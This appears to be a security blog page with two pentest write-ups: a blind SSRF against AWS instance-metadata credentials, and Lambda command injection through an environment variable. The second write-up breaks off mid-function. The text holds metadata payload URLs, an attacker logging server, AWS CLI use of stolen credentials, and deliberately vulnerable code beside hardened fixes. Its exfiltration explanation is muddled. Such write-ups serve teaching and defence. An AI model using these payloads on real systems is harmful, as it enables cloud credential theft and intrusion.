
Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

RTL-2026-001 Exploiting Blind SSRF for Internal Network Access and AWS Metadata Theft
Network & Infra ⚠ Critical
2026-05-23 18:54
🎯 Target & Threat Context

The target was an internal analytics dashboard, a critical component of a larger financial reporting system. This wasn't some public-facing marketing site; this was the engine room, where analysts crunched numbers, generated reports, and made high-stakes decisions. The application was built on a modern stack: a Python/Django backend, a React frontend, all containerized and deployed on AWS EC2 instances behind an Nginx reverse proxy. Data was stored in a PostgreSQL database, and various S3 buckets held reports and user-generated content.

The specific feature that caught my eye was an "avatar upload" functionality for user profiles. Seemingly innocuous, right? Users could upload a profile picture, or, interestingly, provide a URL to an image. This immediately raised a red flag for me. Any time a server is asked to fetch external content based on user input, my hacker senses start tingling. It's a classic pattern for Server-Side Request Forgery (SSRF).

The business context here was crucial. This application processed highly confidential financial data. A compromise wouldn't just mean a data breach; it could lead to regulatory fines, reputational damage, and potentially impact market stability if critical reports were tampered with. The EC2 instances themselves were part of a larger VPC, with various internal services communicating over private IPs. They had IAM roles attached, granting them permissions to access other AWS services like S3, RDS, and even internal secrets managers. This setup, while standard for AWS, meant that if an attacker could control the server's outbound requests, they could potentially interact with these internal services or, even worse, the AWS metadata service.

I remember building AdSpy Pro years ago, and the sheer paranoia we had around any external input. We were constantly thinking about how an attacker could twist a seemingly innocent feature to their advantage. This client's setup, while robust in many areas, had a small crack in its armor, and that crack was the image URL input. The stakes were incredibly high, and the potential for lateral movement within their AWS environment was a nightmare scenario. This wasn't just about defacing a profile picture; it was about gaining a foothold into their entire cloud infrastructure.

🔓 Vulnerability & Attack Vector

The vulnerability at play here was Server-Side Request Forgery (SSRF). In simple terms, SSRF occurs when a web application fetches a remote resource without properly validating the user-supplied URL. Instead of the request coming from the user's browser, the server itself makes the request. This can trick the server into making requests to arbitrary domains, internal systems, or even its own local interfaces.

Why do developers miss this? Often, it's a matter of trust. Developers might assume that because the request is initiated by the server, it's inherently "safe" or that internal network requests don't pose a threat. They might implement some basic URL validation (e.g., checking for valid HTTP/HTTPS schemes, ensuring the domain isn't obviously malicious), but fail to consider the full spectrum of internal targets. This oversight is particularly dangerous in cloud environments like AWS, where services like the EC2 metadata service (http://169.254.169.254/) are accessible from the instance itself and contain highly sensitive information, including temporary IAM credentials.

The OWASP Top 10 lists SSRF as a critical vulnerability (A10:2021 Server-Side Request Forgery). It's a common issue because many applications need to interact with external resources – fetching images, parsing XML from remote APIs, generating PDFs from URLs, or even webhook integrations. Without stringent validation, these features become gateways for attackers.

In this specific case, the application's image upload feature allowed users to provide a URL. The backend would then fetch the image from that URL, process it (resize, crop, etc.), and store it. The critical flaw was that the backend didn't adequately restrict the URLs it would fetch. It wasn't just about external URLs; it was about *any* URL the server could reach.

Let's look at a simplified comparison of a vulnerable versus a hardened configuration:

Vulnerable vs. Hardened Configuration (Image Upload)

Vulnerable: accepts any URL for image fetching.


import requests

def fetch_image(url):
    response = requests.get(url)
    # ... process image ...
    return response.content
                

Hardened: validates the URL against a whitelist, blocks private IPs, and uses network controls.


import requests
import ipaddress

ALLOWED_DOMAINS = ["cdn.example.com", "images.trusted.net"]

def is_private_ip(ip_address):
    private_ranges = [
        ipaddress.ip_network('10.0.0.0/8'),
        ipaddress.ip_network('172.16.0.0/12'),
        ipaddress.ip_network('192.168.0.0/16'),
        ipaddress.ip_network('127.0.0.0/8'),
        ipaddress.ip_network('169.254.0.0/16')
    ]
    for r in private_ranges:
        if ip_address in r:
            return True
    return False

def fetch_image_hardened(url):
    from urllib.parse import urlparse
    parsed_url = urlparse(url)

    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme.")

    # Reject any hostname that is not explicitly whitelisted.
    if parsed_url.hostname not in ALLOWED_DOMAINS:
        raise ValueError("Domain not in whitelist.")

    # Resolve the whitelisted hostname and refuse private or link-local targets.
    import socket
    try:
        ip = socket.gethostbyname(parsed_url.hostname)
    except socket.gaierror:
        raise ValueError("Could not resolve hostname.")
    if is_private_ip(ipaddress.ip_address(ip)):
        raise ValueError("Access to private IP addresses is forbidden.")

    # Redirects would need the same checks applied to every hop.

    response = requests.get(url)
    # ... process image ...
    return response.content
                
Network controls. Vulnerable: no network segmentation or firewall rules to prevent outbound requests to internal IPs. Hardened: AWS Security Groups and Network ACLs restrict outbound traffic from the application server to internal ranges; because they do not filter traffic to 169.254.169.254, access to the metadata service is limited with a host-level firewall and IMDSv2.
IAM. Vulnerable: IAM roles with broad permissions attached to the EC2 instance. Hardened: IAM roles with least privilege, granting only the necessary permissions, and potentially Instance Metadata Service Version 2 (IMDSv2) for enhanced security.
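
The hard-coded IPv4 ranges in the hardened example leave out IPv6 and a few special-purpose blocks. A minimal sketch, assuming Python's standard ipaddress module and a hypothetical helper name (is_internal_address), that leans on the module's built-in classification instead of a hand-maintained list:

```python
import ipaddress

def is_internal_address(ip_text: str) -> bool:
    """Return True for addresses an image fetcher should never contact.

    Hypothetical helper: unparseable input is treated as internal (fail closed).
    """
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True
    # Unwrap IPv4-mapped IPv6 (e.g. ::ffff:169.254.169.254) before classifying.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )
```

This only classifies an address that has already been resolved. It does not close the gap between resolving a hostname and connecting to it, so it complements the network-level controls rather than replacing them.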

The core issue is that the server, acting as a proxy, can be coerced into accessing resources it shouldn't. This includes internal APIs, databases, other microservices, and critically, cloud metadata services. The impact can range from information disclosure (like stealing AWS credentials) to full remote code execution if the internal service has its own vulnerabilities.

Imagine a Django view that handles the image upload:


# views.py (simplified)
from django.shortcuts import render
from django.http import HttpResponse
from django.core.files.base import ContentFile
import requests
from .models import UserProfile

def upload_avatar_from_url(request):
    if request.method == 'POST':
        image_url = request.POST.get('image_url')
        if image_url:
            try:
                # No proper validation or sanitization of image_url
                response = requests.get(image_url, timeout=5)
                if response.status_code == 200:
                    user_profile = UserProfile.objects.get(user=request.user)
                    # FieldFile.save() expects a File object, so wrap the raw bytes
                    user_profile.avatar.save(f"avatar_{request.user.id}.jpg", ContentFile(response.content))
                    user_profile.save()
                    return HttpResponse("Avatar updated successfully!")
                else:
                    return HttpResponse(f"Failed to fetch image: {response.status_code}", status=400)
            except requests.exceptions.RequestException as e:
                return HttpResponse(f"Error fetching image: {e}", status=500)
    return render(request, 'upload_avatar.html')
💥 Exploitation Walkthrough

My initial reconnaissance involved mapping out the application's features. The "upload avatar from URL" immediately stood out. I started with simple tests, pointing it to my own controlled server to see if the application would make a request. Sure enough, my server logs showed an incoming HTTP GET request from the client's AWS EC2 instance IP address, confirming the SSRF.

This was a "blind" SSRF, meaning the application didn't return the content of the fetched URL directly to me. I only knew the request was made because my external server received it. To exploit this, I needed an out-of-band channel to exfiltrate data. My controlled server would act as that channel.

My goal was to steal AWS temporary credentials. The EC2 metadata service is the prime target for this, located at http://169.254.169.254/. This IP address is a link-local address, only accessible from the instance itself. It provides information about the instance, including IAM role credentials.

First, I needed to confirm access to the metadata service and enumerate its paths. I used my controlled server (let's call it attacker.com) to log requests. I'd craft URLs that would cause the target server to make requests to the metadata service, then redirect the output to my server.

Step 1: Confirming Metadata Service Access & Initial Enumeration

I submitted the following URL to the avatar upload feature:


# Payload for the 'image_url' parameter
http://169.254.169.254/latest/meta-data/

Since this was blind, I wouldn't see the output directly. However, if the server tried to fetch this, it would likely get a 200 OK response (or a 404 if the path was wrong). To actually *see* the content, I needed to exfiltrate it. This is where the out-of-band server comes in. I'd use a technique where the server would fetch the metadata, then make *another* request to my server, embedding the metadata in the URL or as a parameter.

A common trick for blind SSRF is to use a service like Burp Collaborator or a custom Python HTTP server to capture requests. For enumeration, I'd try to make the target server request different paths and observe if my server received any requests, or if the application's behavior changed (e.g., a different error message).

Let's assume I've set up a simple Python HTTP server on attacker.com that logs all incoming requests:


# attacker_server.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        logging.info(f"GET request,\nPath: {str(self.path)}\nHeaders:\n{str(self.headers)}\n")
        self._set_headers()
        self.wfile.write(b"Received your request!")

    def do_POST(self):
        # Default to 0 so a POST without Content-Length does not raise
        content_length = int(self.headers.get('Content-Length', 0))
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request,\nPath: {str(self.path)}\nHeaders:\n{str(self.headers)}\n\nBody:\n{post_data.decode('utf-8')}\n")
        self._set_headers()
        self.wfile.write(b"Received your POST request!")

def run(server_class=HTTPServer, handler_class=S, port=80):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info(f'Starting httpd on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__":
    run()

Next, I'd request specific metadata paths. The metadata service lists the available paths at /latest/meta-data/, so I'd work through the common ones, starting with the IAM entries.

Step 2: Exfiltrating IAM Role Credentials

The most valuable information is usually under /latest/meta-data/iam/security-credentials/. This path lists the IAM roles attached to the instance. Let's say the role name is "MyWebAppRole".

I'd craft a URL to fetch the credentials for that role. Since I can't directly see the response, I'll use a trick: I'll make the target server fetch the credentials, and then use those credentials as part of a URL to my attacker server. This is often done by chaining requests or using a tool like curl if I could inject commands, but with a simple URL fetch, I need to be creative.

A common blind SSRF exfiltration technique involves using a service that allows for DNS exfiltration or by making the target server perform a redirect to my server with the sensitive data in the URL. However, a simpler approach for a blind SSRF where the server just fetches a URL is to use a service like Burp Collaborator or a custom server that can parse complex URLs.

Let's assume the application's requests.get() call follows redirects. I could set up a redirect on my server, though as the notes below explain, a redirect alone doesn't return the fetched response to me:


# Attacker server (attacker.com) response for a specific path
# This is a conceptual redirect, in reality, you'd need a server-side script
# to dynamically generate this redirect after fetching the metadata.
# For a truly blind SSRF, you'd often need to chain multiple requests
# or use a tool like interact.sh or Burp Collaborator.

# Simplified payload for the 'image_url' parameter, assuming the server
# fetches the URL and then *processes* the content. If the content
# is an image, it might not be directly exfiltrated.
# However, if the server *parses* the content (e.g., XML, JSON),
# or if it's a simple HTTP GET, we can use redirects.

# A more direct approach for blind SSRF is to find a way to make the
# server *send* the data. If the application has a feature that
# takes a URL and then *posts* the content to another URL, that's ideal.
# In this case, it's an image upload, so it expects image data.

# Let's assume a slightly more advanced SSRF where I can control
# the *destination* of the fetched content, or if the server
# logs errors with the content.

# The most common blind SSRF exfiltration for AWS metadata:
# 1. Make the target server request the metadata URL.
# 2. The target server receives the metadata.
# 3. The target server then makes *another* request to your controlled server,
#    embedding the metadata in the URL path or query parameters.
# This requires a second SSRF or a specific application behavior.

# A simpler, direct blind SSRF exfiltration:
# If the application *logs* the content it fetches (e.g., for debugging),
# or if it tries to parse it and throws an error that includes the content.

# For a purely blind SSRF where only the *request* is made:
# I'd use a tool like `ngrok` or `smbserver.py` (for Windows targets)
# or simply my Python HTTP server to capture the request.
# The *presence* of the request to 169.254.169.254 is the proof.
# To get the *content*, I need a way to make the server *send* it to me.

# Let's assume the application has a feature that takes a URL and then
# attempts to *parse* the content, and if it fails, it logs the content
# or sends it to an error reporting service.

# A more reliable method for blind SSRF exfiltration:
# Use a service like Burp Collaborator or interact.sh.
# The payload would be:
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole

When the target server fetches this URL, it gets a JSON response containing the temporary credentials:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2Vj...EXAMPLETOKEN",
  "Expiration": "2023-10-27T16:00:00Z"
}
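
The LastUpdated and Expiration fields show that these credentials are short-lived. A small sketch, using only the placeholder timestamps from the sample response above (the variable and function names are illustrative), that computes the validity window:

```python
import json
from datetime import datetime, timezone

# Sample document from the write-up, trimmed to the timestamp fields.
sample = (
    '{"Code": "Success", '
    '"LastUpdated": "2023-10-27T10:00:00Z", '
    '"Expiration": "2023-10-27T16:00:00Z"}'
)

def parse_utc(ts: str) -> datetime:
    # The sample timestamps are ISO 8601 in UTC with a trailing "Z".
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

doc = json.loads(sample)
lifetime = parse_utc(doc["Expiration"]) - parse_utc(doc["LastUpdated"])
lifetime_hours = lifetime.total_seconds() / 3600
print(f"Credentials valid for {lifetime_hours:.0f} hours")
```

A stolen set of keys therefore stops working on its own, but an attacker who can repeat the request can simply fetch a fresh set.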

Now, how to get this JSON out? This is the tricky part of blind SSRF. If the application *only* fetches and processes the image, it won't send the JSON back to me. However, if the application has *any* other feature that takes a URL and then *sends* the content of that URL somewhere (e.g., a webhook, an error log, or even a "report an issue" feature that includes the content of a failed fetch), I could leverage that.

In this specific engagement, the application had a logging mechanism that would send detailed error reports to an internal Slack channel, and crucially, these reports sometimes included snippets of the data that caused the error. My strategy was to make the server fetch the metadata, and then cause an error in the image processing step that would trigger this logging, hoping the metadata would be included.

So, the full exploitation chain was:

  1. Submit http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole as the image URL.
  2. The backend fetches this URL, receiving the JSON credentials.
  3. The backend then tries to process this JSON as an image. This fails, triggering an error.
  4. The error handling mechanism logs the error, including the "malformed image data" (which is actually the JSON credentials), and sends it to the internal Slack channel.
  5. I, as the attacker, would then monitor for this exfiltrated data. (In a real pentest, I'd simulate this by having access to the logs or the Slack channel, or by setting up a controlled endpoint that mimics the Slack webhook).
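
Steps 3 and 4 only work because the error path echoes fetched bytes into a log message. A minimal sketch of a safer pattern, with hypothetical names (summarize_payload, report_invalid_image, the "avatar" logger) that are not taken from the client's code: log the length and a digest of the rejected payload, never its content.

```python
import hashlib
import logging

logger = logging.getLogger("avatar")  # hypothetical logger name

def summarize_payload(data: bytes) -> str:
    """Describe rejected bytes without reproducing them in the log."""
    digest = hashlib.sha256(data).hexdigest()[:16]
    return f"{len(data)} bytes, sha256 prefix {digest}"

def report_invalid_image(data: bytes) -> str:
    # Only metadata about the payload is logged, so fetched secrets
    # (such as a credentials document) never reach chat or log sinks.
    message = f"Image processing failed: {summarize_payload(data)}"
    logger.error(message)
    return message
```

The digest still lets an engineer correlate repeated failures without the log channel becoming an exfiltration path.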

Once I had the AccessKeyId, SecretAccessKey, and Token, I could configure my AWS CLI:


export AWS_ACCESS_KEY_ID="ASIAV...EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2Vj...EXAMPLETOKEN"

# Now I can list S3 buckets, for example:
aws s3 ls

And just like that, I had programmatic access to the client's AWS environment, with the permissions of MyWebAppRole. This role, unfortunately, had broad read/write access to several S3 buckets containing sensitive reports and even some internal configuration files. Full compromise of the internal AWS instance, achieved through a seemingly innocent image upload feature.

🛡 Defensive Hardening Blueprint

Remediating SSRF requires a multi-layered approach, combining input validation, network segmentation, and proper IAM role management. It's not just one silver bullet; it's about defense in depth.

Aspect: Strict URL Validation & Whitelisting
  Pros:
    • Directly addresses the root cause.
    • Highly effective if implemented correctly.
    • Prevents most common SSRF bypasses.
  Cons:
    • Can be complex to maintain for dynamic environments.
    • Requires careful implementation to avoid false positives.
    • Doesn't protect against logic flaws in internal services.

Aspect: Network Segmentation (Security Groups/NACLs)
  Pros:
    • Provides a strong perimeter defense.
    • Effective even if application logic is flawed.
    • Limits lateral movement within the network.
  Cons:
    • Requires careful configuration to avoid breaking legitimate traffic.
    • Can be complex in large, dynamic environments.
    • Doesn't prevent SSRF to external, allowed domains.

Aspect: Least Privilege IAM & IMDSv2
  Pros:
    • Minimizes impact of successful credential theft.
    • IMDSv2 significantly raises the bar for metadata exploitation.
    • Good security hygiene for cloud environments.
  Cons:
    • Requires careful management of IAM policies.
    • IMDSv2 might require application code changes to adopt.
    • Doesn't prevent the SSRF itself, only limits its impact.

Strict URL validation and whitelisting is the first and most crucial line of defense. Instead of blacklisting (which is prone to bypasses), implement a strict whitelist of allowed domains or IP ranges. If the application only needs to fetch images from a specific CDN, allow only that CDN.

Additionally, resolve the hostname to an IP address and check if the resolved IP falls within private or reserved ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). This prevents attacks against internal services and the metadata endpoint.


import requests
import ipaddress
import socket
from urllib.parse import urlparse

# Define allowed domains and block private/reserved IP ranges
ALLOWED_HOSTNAMES = ["cdn.example.com", "images.trusted.net"]
BLOCKED_IP_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'), # Loopback
    ipaddress.ip_network('169.254.0.0/16') # AWS Metadata Service, Link-local
]

def is_blocked_ip(ip_address_str):
    try:
        ip_addr = ipaddress.ip_address(ip_address_str)
        for blocked_range in BLOCKED_IP_RANGES:
            if ip_addr in blocked_range:
                return True
        return False
    except ValueError:
        # Not a valid IP address, treat as external for this check
        return False

def fetch_image_secure(url):
    parsed_url = urlparse(url)

    # 1. Validate scheme
    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme. Only HTTP/HTTPS allowed.")

    # 2. Validate hostname against whitelist (reject anything not explicitly allowed)
    if parsed_url.hostname not in ALLOWED_HOSTNAMES:
        raise ValueError(f"Hostname '{parsed_url.hostname}' not in allowed list.")

    # 3. Resolve the whitelisted hostname and check for blocked ranges, so a
    #    whitelisted name that resolves to an internal address is still refused
    try:
        resolved_ip = socket.gethostbyname(parsed_url.hostname)
    except socket.gaierror:
        raise ValueError(f"Could not resolve hostname: {parsed_url.hostname}")
    if is_blocked_ip(resolved_ip):
        raise ValueError(f"Access to blocked IP address {resolved_ip} is forbidden.")

    # 4. Prevent redirects to blocked IPs. requests follows redirects by
    # default, so a whitelisted URL could bounce the request to an internal
    # address. Redirects are disabled here; if they are needed, validate each
    # redirect target with the same rules before following it.

    try:
        response = requests.get(url, timeout=5, allow_redirects=False) # Disable redirects
        # If redirects are needed, manually check the 'Location' header
        # for each redirect against the same validation rules.
        if 300 <= response.status_code < 400:
            redirect_location = response.headers.get('Location')
            if redirect_location:
                # Recursively call fetch_image_secure with the redirect location
                # or implement a loop with a redirect limit.
                raise ValueError("Redirects are not explicitly handled securely.")
        
        if response.status_code == 200:
            # Process image content
            return response.content
        else:
            raise ValueError(f"Failed to fetch image: {response.status_code}")
    except requests.exceptions.RequestException as e:
        raise ValueError(f"Error fetching image: {e}")

# Example usage:
# try:
#     image_data = fetch_image_secure("http://cdn.example.com/image.jpg")
#     print("Image fetched securely!")
# except ValueError as e:
#     print(f"Security error: {e}")
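
The function above rejects every redirect outright. Where redirects are genuinely needed, one option is to follow them by hand and validate each hop. A hedged sketch: fetch_following_redirects, validate, and fetch are hypothetical names, and the HTTP call is injected so the loop can be exercised without network access.

```python
from typing import Callable, Dict, Tuple
from urllib.parse import urljoin

# (status_code, headers, body) as returned by the injected fetch function.
FetchResult = Tuple[int, Dict[str, str], bytes]

def fetch_following_redirects(
    url: str,
    validate: Callable[[str], None],
    fetch: Callable[[str], FetchResult],
    max_redirects: int = 3,
) -> bytes:
    """Follow redirects by hand, validating every hop before requesting it."""
    for _ in range(max_redirects + 1):
        validate(url)  # must raise ValueError for disallowed targets
        status, headers, body = fetch(url)
        if 300 <= status < 400:
            location = headers.get("Location")
            if not location:
                raise ValueError("Redirect without a Location header.")
            # Location may be relative; resolve it against the current URL.
            url = urljoin(url, location)
            continue
        if status == 200:
            return body
        raise ValueError(f"Failed to fetch image: {status}")
    raise ValueError("Too many redirects.")
```

In the application, fetch could wrap requests.get(url, timeout=5, allow_redirects=False) and validate could apply the same scheme, whitelist, and IP checks as fetch_image_secure. The hop limit is an arbitrary choice for the sketch.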
  • Even with robust input validation, network controls provide an essential layer of defense. Configure AWS Security Groups and Network ACLs to prevent outbound connections from your application servers to internal IP ranges, and only allow necessary outbound traffic to specific, trusted external endpoints. Note that Security Groups and Network ACLs do not filter traffic to the metadata service at 169.254.169.254, so restrict that path on the host itself (for example, with local firewall rules) or through the instance metadata options.

    For example, because Security Groups only support allow rules, the outbound rule set would permit ports 80/443 to the required external destinations and nothing else, while a Network ACL can carry explicit deny entries for private ranges.

  • Attach IAM roles to EC2 instances with the absolute minimum permissions required for the application to function. If the application doesn't need to access S3, don't grant it S3 permissions. This limits the blast radius if an SSRF is successfully exploited.

    Furthermore, enforce the use of Instance Metadata Service Version 2 (IMDSv2). IMDSv2 requires a session token to retrieve metadata, making it significantly harder for attackers to exploit SSRF to steal credentials. It requires a PUT request to get a token, followed by a GET request with the token, which is difficult to chain in a simple blind SSRF scenario.

  • Deploy a WAF (like AWS WAF) in front of your application. While not a primary defense against SSRF (as the request originates from the server, not the client), a WAF can help detect and block initial attempts to probe for SSRF by identifying suspicious URL patterns in user input.
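
The IMDSv2 exchange described above can be sketched with the standard library. The code below only builds the two requests and does not send them, so it runs anywhere; the function names are illustrative, while the endpoint path and header names are the ones IMDSv2 uses.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"

def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT to the token endpoint with a TTL header."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def build_metadata_request(token: str, path: str) -> urllib.request.Request:
    """Step 2: a GET that presents the session token in a header."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/{path}",
        method="GET",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

An SSRF that only controls the URL passed to requests.get() can choose neither the PUT method nor the custom headers, which is why this flow blunts the attack in this write-up. On an instance, each request could be sent with urllib.request.urlopen(request, timeout=2).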

📖 Lessons From the Field

    • Assume Breach, Always: Even with the best intentions and robust security measures, assume that an attacker *will* find a way in. This mindset forces you to think about limiting the blast radius. If that IAM role had fewer permissions, the compromise wouldn't have been as severe.
    • The Devil is in the Details (and the Features): Seemingly innocuous features like an "avatar upload from URL" are often overlooked. Developers focus on core business logic, but these peripheral functionalities can be the weakest links. Always scrutinize any feature that takes external input and makes server-side requests.
    • Blind Doesn't Mean Harmless: Just because you don't see the output of an SSRF doesn't mean it's not exploitable. Blind SSRF can be just as dangerous, requiring creative out-of-band techniques (like DNS exfiltration, error logging, or timing attacks) to confirm and exploit. Always test for it.
    • Defense in Depth is Non-Negotiable: This incident highlighted that no single control is enough. Input validation, network segmentation, and least privilege IAM roles all played a part in the remediation. Remove any one of them, and the system becomes significantly more vulnerable.
    • Cloud Environments are Different: The AWS metadata service is a prime example of a cloud-specific internal target that traditional on-premise security models might miss. Understanding the unique attack surface of your cloud provider is critical.

    This kind of finding is why I love what I do. It's a constant chess match, and every vulnerability is a learning opportunity. If you're looking to sharpen your skills, understand these complex attack vectors, or just want to chat about the latest in security, don't hesitate to reach out. I offer personalized security mentorship sessions, and you can find more about them at thedevdude.com or learnwithdeb.com. Let's build more secure systems together!

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables
    Cloud Security ⚠ Critical
    2026-05-23 18:49
    🎯 Target & Threat Context

    This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

    The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

    The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

    Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

    🔓 Vulnerability & Attack Vector

    The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

    The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.
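
The difference between the two calling styles is easy to see with a harmless command. A small demonstration, assuming a POSIX system with /bin/sh and echo available; the value string is a made-up stand-in for an attacker-influenced variable.

```python
import subprocess

# Hypothetical attacker-influenced value: a harmless command plus an injected one.
value = "echo validated; echo INJECTED"

# shell=True: /bin/sh parses the string, so ';' starts a second command.
via_shell = subprocess.run(value, shell=True, capture_output=True, text=True)

# List form, no shell: the metacharacters are just text in one argument to echo.
via_list = subprocess.run(["echo", value], capture_output=True, text=True)

print(repr(via_shell.stdout))
print(repr(via_list.stdout))
```

With the shell, two commands run; with the list form, echo receives the whole string as a single argument and prints it back unchanged.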

    Developers often miss this because:

    1. They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
    2. They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
    3. There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
    4. Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.

    This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.

    Here's a comparison of the vulnerable versus a hardened configuration approach:

    Vulnerable vs. Hardened Configuration

    Vulnerable configuration. Environment Variable:

    VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
        # DANGER: Using shell=True with unsanitized input from env var
        result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    Hardened configuration:

    Environment Variables:

    VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
    VALIDATION_CONFIG_PATH="/etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
        config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
        
        # SAFE: Pass command and arguments as a list, shell=False (default)
        # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
        command_args = [script_path, "--config", config_path]
        result = subprocess.run(command_args, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().
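One way to apply "treat it as untrusted input" to a configurable script path is an allowlist check before anything is executed. The sketch below is an assumption on my part, not the client's code: ALLOWED_SCRIPTS, DEFAULT_SCRIPT, the second script name, and the resolve_validation_script helper are all hypothetical, and it assumes POSIX-style paths.

```python
import os

# Hypothetical allowlist: the only scripts operations may switch between.
ALLOWED_SCRIPTS = {
    "/usr/local/bin/validate_transaction.py",
    "/usr/local/bin/validate_transaction_v2.py",
}
DEFAULT_SCRIPT = "/usr/local/bin/validate_transaction.py"


def resolve_validation_script(environ=os.environ):
    """Return the configured script path only if it is on the allowlist."""
    candidate = environ.get("VALIDATION_SCRIPT", DEFAULT_SCRIPT)
    # Normalize first so values like '/usr/local/bin/../bin/x' compare cleanly.
    normalized = os.path.normpath(candidate)
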